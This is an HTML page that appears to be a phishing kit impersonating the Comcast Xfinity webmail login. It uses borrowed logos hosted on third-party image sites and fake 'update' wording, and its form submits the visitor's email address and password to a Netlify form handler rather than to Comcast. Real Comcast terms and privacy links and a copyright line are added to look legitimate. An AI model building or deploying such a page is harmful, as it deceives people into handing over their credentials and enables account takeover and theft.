<!DOCTYPE html>
<html>
<head>
<img align="top" alt="Support Center -Xfinity" src="https://live.staticflickr.com/3041/5714759606_224aa2cb0c.jpg" width="100" height="60">
	<meta charset="UTF-8">
	<title>Xfinity Webmail</title>
	<link href="style.css" rel="stylesheet">
</head>
<body>
<body style="background-color:white;">
<p>
<p>
<p>
<p>
<div class="login-page">
<div class="form">
<img align="top" alt="Xfinity" src="https://static.wixstatic.com/media/244633_8e1d158fd0a44bc9ba92187461384767~mv2.gif" width="140" height="60">
<form name="contact"  action="/success/" method="POST" data-netlify="true">

		    
						<li>We've updated our webmail look and feel so it's simpler to use.</li>

  <p><strong>Please note: </strong>Enter your entire email address and password to login/Update.

    </p>
<fieldset>
<div style="text-align:center;">
<h2 translate="LANG_CUSTOM_LOGIN_INFOBOX_TITLE" translate-cloak="LANG_CUSTOM_LOGIN_INFOBOX_TITLE" class="ng-scope">Welcome to Xfinity Email</h2>
        <input type="text" name="username" id="username" title="username" value="" onfocus="this.select()" tabindex="1" placeholder=" Email Address:">
        <br>
        <br>
        <input type="password" name="password" id="password" title="password" tabindex="2" placeholder="Password:">
        <input type="hidden" name="u" value="email/webmail">
        <input type="hidden" name="c" value="">
        <br>
        <br>

    <button type="Login submit-button">Switch to the newest comcast Mail</button>
  </p>
</form>
<p id="implied-legal">By Updating, you agree to our <a href="https://my.xfinity.com/terms/web/">Terms of Service</a> and <a href="https://www.xfinity.com/privacy/policy">Privacy Policy</a>.</p>

				&nbsp;&nbsp;<span class="footer_text">© 2020 Comcast All Rights Reserved.&nbsp;&nbsp;
			</span>							